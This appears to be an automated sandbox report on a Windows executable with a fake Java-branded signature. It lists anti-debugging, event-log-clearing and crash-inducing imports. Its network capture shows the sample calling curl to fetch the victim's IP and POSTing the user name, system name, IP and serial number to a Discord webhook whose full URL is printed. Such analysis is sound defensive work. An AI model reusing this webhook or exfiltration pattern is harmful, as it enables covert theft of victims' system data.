                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@8.P!V.P!V.P!V.YY..^!V.A.U.T!V.A.R.Z!V.A.S.r!V.A.W.V!V..YP.R!V..YW.C!V.P!W..!V..._.T!V.....Q!V.P!..Q!V...T.Q!V.RichP!V........

                                      File Icon

                                      Icon Hash:928a8e8ea68e8ea2

                                      Static PE Info

                                      General

                                      Entrypoint:0x14000dd98
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x140000000
                                      Subsystem:windows cui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x676BA8A7 [Wed Dec 25 06:39:35 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:6d5db8024793ecbed51b9c77c74726e2

                                      Authenticode Signature

                                      Signature Valid:false
                                      Signature Issuer:CN=JavaPlatformSE, O=Java Platform SE, L=Redmond, S=Washington, C=US
                                      Signature Validation Error:The signature of the certificate cannot be verified
                                      Error Number:-2146869244
                                      Not Before, Not After
                                      • 25/12/2024 07:40:33 27/01/2026 07:40:33
                                      Subject Chain
                                      • CN=JavaPlatformSE, O=Java Platform SE, L=Redmond, S=Washington, C=US
                                      Version:1
                                      Thumbprint MD5:443C2AE946511AE073AD36F7AF2A47C3
                                      Thumbprint SHA-1:A3D5999CD617AB15070F1E9FE40600BF2273A96D
                                      Thumbprint SHA-256:F243A8747E38EE617248E0365EF58B0A7C70A3083754DD87A8D200E12D516983
                                      Serial:01

                                      Entrypoint Preview

                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      call 00007F5508534BE0h
                                      dec eax
                                      add esp, 28h
                                      jmp 00007F55085345E7h
                                      int3
                                      int3
                                      dec eax
                                      sub esp, 28h
                                      call 00007F5508535238h
                                      test eax, eax
                                      je 00007F5508534793h
                                      dec eax
                                      mov eax, dword ptr [00000030h]
                                      dec eax
                                      mov ecx, dword ptr [eax+08h]
                                      jmp 00007F5508534777h
                                      dec eax
                                      cmp ecx, eax
                                      je 00007F5508534786h
                                      xor eax, eax
                                      dec eax
                                      cmpxchg dword ptr [00009B20h], ecx
                                      jne 00007F5508534760h
                                      xor al, al
                                      dec eax
                                      add esp, 28h
                                      ret
                                      mov al, 01h
                                      jmp 00007F5508534769h
                                      int3
                                      int3
                                      int3
                                      dec eax
                                      sub esp, 28h
                                      test ecx, ecx
                                      jne 00007F5508534779h
                                      mov byte ptr [00009B09h], 00000001h
                                      call 00007F5508534F25h
                                      call 00007F5508534C4Ch
                                      test al, al
                                      jne 00007F5508534776h
                                      xor al, al
                                      jmp 00007F5508534786h
                                      call 00007F5508534C3Fh
                                      test al, al
                                      jne 00007F550853477Bh
                                      xor ecx, ecx
                                      call 00007F5508534C34h
                                      jmp 00007F550853475Ch
                                      mov al, 01h
                                      dec eax
                                      add esp, 28h
                                      ret
                                      int3
                                      int3
                                      inc eax
                                      push ebx
                                      dec eax
                                      sub esp, 20h
                                      cmp byte ptr [00009AD0h], 00000000h
                                      mov ebx, ecx
                                      jne 00007F55085347D9h
                                      cmp ecx, 01h
                                      jnbe 00007F55085347DCh
                                      call 00007F55085351AEh
                                      test eax, eax
                                      je 00007F550853479Ah
                                      test ebx, ebx
                                      jne 00007F5508534796h
                                      dec eax
                                      lea ecx, dword ptr [00009ABAh]
                                      call 00007F55085352E1h
                                      test eax, eax
                                      jne 00007F5508534782h
                                      dec eax
                                      lea ecx, dword ptr [00009AC2h]
                                      call 00007F55085347D1h

                                      Rich Headers

                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x14d2c0x190.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x2dea8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x180000xd8c.pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x454000x1c80
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x470000x110.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x11c500x38.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11b100x140.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x100000x5b0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000xeadf0xec00efac4e5070bf8589e67c18078c14ddf5False0.4986261917372881data6.183615469000689IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x100000x69860x6a0011d61899386f43b457b708a0696704e7False0.4224277712264151data5.168018809604822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x170000xf000xa00157509527a0126437cf9155d09698fcfFalse0.200390625data3.928920356631935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .pdata0x180000xd8c0xe0098096472afc420f731802132a2ac25ddFalse0.46484375data4.772663047851322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x190000x2dea80x2e0009e2d061b3beb1a8f6c101935a3c5414bFalse0.30647078804347827data5.805166306881057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x470000x1100x200999cb7eb3ee595af15dabb97b3db2801False0.4609375data3.5019216086408944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x192700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.5851063829787234
                                      RT_ICON0x196d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.46967213114754097
                                      RT_ICON0x1a0600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.39141651031894936
                                      RT_ICON0x1b1080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.2992738589211618
                                      RT_ICON0x1d6b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.24557156353330184
                                      RT_ICON0x218d80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.22093345656192237
                                      RT_ICON0x26d600x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.1813380281690141
                                      RT_ICON0x302080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.14613155092866437
                                      RT_ICON0x40a300x6266PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9994839221913457
                                      RT_GROUP_ICON0x46c980x84dataEnglishUnited States0.75
                                      RT_MANIFEST0x46d200x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                      Imports

                                      DLLImport
                                      KERNEL32.dllGetModuleFileNameW, GetFileAttributesW, SetFileAttributesW, CreateToolhelp32Snapshot, Sleep, Process32NextW, LoadLibraryA, QueryPerformanceFrequency, Process32FirstW, CloseHandle, FreeLibrary, CopyFileW, QueryPerformanceCounter, CheckRemoteDebuggerPresent, ReadFile, CreatePipe, GetCurrentProcess, CreateProcessA, GetVolumeInformationW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetConsoleWindow, SetConsoleCtrlHandler, GetModuleHandleW, GetComputerNameW, GetProcAddress, GetLogicalDriveStringsA, GetVersionExW, GetDriveTypeA, GetCurrentThreadId, GetCurrentProcessId, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, LocalFree, WaitForSingleObject
                                      USER32.dllShowWindow, RemoveMenu, GetSystemMenu
                                      ADVAPI32.dllClearEventLogW, RegOpenKeyExA, RegCloseKey, RegQueryValueExA, GetUserNameW, CloseEventLog, OpenEventLogW
                                      SHELL32.dllSHGetKnownFolderPath
                                      ole32.dllCoTaskMemFree, CoInitializeEx, CoCreateInstance, CoUninitialize
                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear, VariantInit
                                      MSVCP140.dll?uncaught_exceptions@std@@YAHXZ, ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z, ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z, ?_Xbad_alloc@std@@YAXXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?id@?$codecvt@_WDU_Mbstatet@@@std@@2V0locale@2@A, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z, ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAPEAV12@PEAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAXAEBVlocale@2@@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?good@ios_base@std@@QEBA_NXZ, ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA@XZ, ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z, ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD@Z, ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z, ?_Decref@facet@locale@std@@UEAAPEAV_Facet_base@3@XZ, ?_Incref@facet@locale@std@@UEAAXXZ, ??Bid@locale@std@@QEAA_KXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?id@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@2V0locale@2@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, _Xtime_get_ticks, ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3@Z, ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ
                                      ntdll.dllRtlAdjustPrivilege, NtRaiseHardError
                                      gdiplus.dllGdiplusStartup, GdiplusShutdown
                                      CRYPT32.dllCryptStringToBinaryA
                                      VCRUNTIME140_1.dll__CxxFrameHandler4
                                      VCRUNTIME140.dll__current_exception, memset, _CxxThrowException, memmove, __current_exception_context, strstr, memcmp, __std_terminate, __std_exception_copy, __C_specific_handler, memcpy, __std_exception_destroy
                                      api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, malloc, _callnewh, free
                                      api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf, _pclose, __stdio_common_vswprintf, __p__commode, _set_fmode, __stdio_common_vswprintf_s, fgets, _popen
                                      api-ms-win-crt-runtime-l1-1-0.dllexit, _exit, _initterm, __p___argc, __p___argv, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _set_app_type, _seh_filter_exe, terminate, _invalid_parameter_noinfo_noreturn, _initterm_e
                                      api-ms-win-crt-string-l1-1-0.dll_wcsicmp
                                      api-ms-win-crt-math-l1-1-0.dll_dsign, __setusermatherr
                                      api-ms-win-crt-time-l1-1-0.dll_gmtime64
                                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale, localeconv

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 30, 2024 11:13:53.888947964 CET49708443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:53.888971090 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:53.889034986 CET49708443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:53.896933079 CET49708443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:53.896954060 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:54.339337111 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:54.339412928 CET49708443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:54.344113111 CET49708443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:54.344139099 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:54.344352961 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:54.347809076 CET49708443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:54.395337105 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:54.455058098 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:54.455115080 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:54.455163956 CET49708443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:54.462182999 CET49708443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:54.462217093 CET44349708104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:54.559737921 CET49711443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:54.559782028 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:54.559849024 CET49711443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:54.565416098 CET49711443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:54.565432072 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:55.001734018 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:55.001966953 CET49711443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:55.004633904 CET49711443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:55.004652023 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:55.004913092 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:55.007596016 CET49711443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:55.055346012 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:55.262825012 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:55.262893915 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:55.262943983 CET49711443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:55.271006107 CET49711443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:55.271034956 CET44349711162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:56.478228092 CET49714443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:56.478359938 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:56.478446960 CET49714443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:56.485018969 CET49714443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:56.485059023 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:56.920701027 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:56.920829058 CET49714443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:56.922247887 CET49714443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:56.922261953 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:56.922476053 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:56.925066948 CET49714443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:56.967338085 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:57.050218105 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:57.050261021 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:57.050307989 CET49714443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:57.055103064 CET49714443192.168.2.5104.26.12.205
                                      Dec 30, 2024 11:13:57.055119991 CET44349714104.26.12.205192.168.2.5
                                      Dec 30, 2024 11:13:57.124243021 CET49717443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:57.124288082 CET44349717162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:57.124358892 CET49717443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:57.130630970 CET49717443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:57.130649090 CET44349717162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:57.567397118 CET44349717162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:57.567470074 CET49717443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:57.568669081 CET49717443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:57.568677902 CET44349717162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:57.568908930 CET44349717162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:57.571290970 CET49717443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:57.615335941 CET44349717162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:57.875379086 CET44349717162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:57.875471115 CET44349717162.159.128.233192.168.2.5
                                      Dec 30, 2024 11:13:57.875566959 CET49717443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:57.883138895 CET49717443192.168.2.5162.159.128.233
                                      Dec 30, 2024 11:13:57.883152962 CET44349717162.159.128.233192.168.2.5

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 30, 2024 11:13:53.877573013 CET6287753192.168.2.51.1.1.1
                                      Dec 30, 2024 11:13:53.884634972 CET53628771.1.1.1192.168.2.5
                                      Dec 30, 2024 11:13:54.549746037 CET5666853192.168.2.51.1.1.1
                                      Dec 30, 2024 11:13:54.556687117 CET53566681.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 30, 2024 11:13:53.877573013 CET192.168.2.51.1.1.10x5fa8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Dec 30, 2024 11:13:54.549746037 CET192.168.2.51.1.1.10xa8b2Standard query (0)discord.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 30, 2024 11:13:53.884634972 CET1.1.1.1192.168.2.50x5fa8No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                      Dec 30, 2024 11:13:53.884634972 CET1.1.1.1192.168.2.50x5fa8No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                      Dec 30, 2024 11:13:53.884634972 CET1.1.1.1192.168.2.50x5fa8No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                      Dec 30, 2024 11:13:54.556687117 CET1.1.1.1192.168.2.50xa8b2No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                      Dec 30, 2024 11:13:54.556687117 CET1.1.1.1192.168.2.50xa8b2No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                      Dec 30, 2024 11:13:54.556687117 CET1.1.1.1192.168.2.50xa8b2No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                      Dec 30, 2024 11:13:54.556687117 CET1.1.1.1192.168.2.50xa8b2No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                      Dec 30, 2024 11:13:54.556687117 CET1.1.1.1192.168.2.50xa8b2No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • api.ipify.org
                                      • discord.com

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549708104.26.12.2054435776C:\Windows\System32\curl.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-30 10:13:54 UTC77OUTGET / HTTP/1.1
                                      Host: api.ipify.org
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      2024-12-30 10:13:54 UTC424INHTTP/1.1 200 OK
                                      Date: Mon, 30 Dec 2024 10:13:54 GMT
                                      Content-Type: text/plain
                                      Content-Length: 12
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8fa14286ff78428e-EWR
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1558&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=715&delivery_rate=1814791&cwnd=222&unsent_bytes=0&cid=c4770ca71d3cc9d0&ts=125&x=0"
                                      2024-12-30 10:13:54 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                      Data Ascii: 8.46.123.189


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549711162.159.128.2334434196C:\Windows\System32\curl.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-30 10:13:55 UTC230OUTPOST /api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm HTTP/1.1
                                      Host: discord.com
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Content-Type: application/json
                                      Content-Length: 483
                                      2024-12-30 10:13:55 UTC483OUTData Raw: 7b 22 65 6d 62 65 64 73 22 3a 5b 7b 22 63 6f 6c 6f 72 22 3a 31 36 37 31 31 36 38 30 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 6c 6f 63 61 6c 20 75 73 65 72 22 2c 22 76 61 6c 75 65 22 3a 22 61 6c 66 6f 6e 73 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 73 79 73 74 65 6d 20 6e 61 6d 65 22 2c 22 76 61 6c 75 65 22 3a 22 35 37 31 33 34 35 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 69 70 20 61 64 64 72 65 73 73 22 2c 22 76 61 6c 75 65 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 73 65 72 69 61 6c 20 6e 75 6d 62 65 72 22 2c 22 76 61 6c 75 65 22 3a
                                      Data Ascii: {"embeds":[{"color":16711680,"fields":[{"inline":false,"name":"local user","value":"user"},{"inline":false,"name":"system name","value":"571345"},{"inline":false,"name":"ip address","value":"8.46.123.189"},{"inline":false,"name":"serial number","value":
                                      2024-12-30 10:13:55 UTC1350INHTTP/1.1 204 No Content
                                      Date: Mon, 30 Dec 2024 10:13:55 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Set-Cookie: __dcfduid=c6a792bac69611ef81656a71a21a7c43; Expires=Sat, 29-Dec-2029 10:13:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1735553636
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DO8BbmeK7aF81qULJBIHHlvlydLY6q7wZPxUgI8zOa%2Bjemgk0H9hsXBrP44qq5aaw8rWJB53YaHT5FyLz3dYdg99jsHeBe5qxtmGoH3LiU7czOC7lDEfXSr15YYR"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=c6a792bac69611ef81656a71a21a7c4323195f739f745fb859996eb7d20b263716662e1b2541728398f69788aac6422c; Expires=Sat, 29-Dec-2029 10:13:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=a6fb67675c6458db05633ea3a4f2045db740914f-1735553635; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      2024-12-30 10:13:55 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 57 79 68 54 48 30 73 76 4a 71 41 59 62 49 37 32 42 48 6a 6f 31 52 70 41 69 48 7a 48 70 34 6a 55 76 69 72 50 53 74 58 6f 62 77 67 2d 31 37 33 35 35 35 33 36 33 35 32 31 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 61 31 34 32 38 62 33 39 66 30 30 63 61 63 2d 45 57 52 0d 0a 0d 0a
                                      Data Ascii: Set-Cookie: _cfuvid=WyhTH0svJqAYbI72BHjo1RpAiHzHp4jUvirPStXobwg-1735553635215-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fa1428b39f00cac-EWR


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549714104.26.12.2054434144C:\Windows\System32\curl.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-30 10:13:56 UTC77OUTGET / HTTP/1.1
                                      Host: api.ipify.org
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      2024-12-30 10:13:57 UTC424INHTTP/1.1 200 OK
                                      Date: Mon, 30 Dec 2024 10:13:57 GMT
                                      Content-Type: text/plain
                                      Content-Length: 12
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
